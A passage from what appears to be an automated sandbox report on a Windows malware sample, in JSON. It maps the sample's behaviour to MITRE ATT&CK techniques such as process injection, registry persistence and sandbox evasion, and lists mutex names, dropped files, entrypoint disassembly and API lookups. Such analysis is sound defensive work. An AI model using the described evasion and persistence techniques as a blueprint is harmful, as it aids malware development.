"https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 13}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrug\"\n \"Global\\giojheiowrghtiovhjwiojrug\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrugzyb\"\n \"Global\\giojheiowrghtiovhjwiojrugzyb\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"085cda53603755dc.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"\n \"085cda53603755dc.exe\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005848)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005864)", "origin": "API Call", 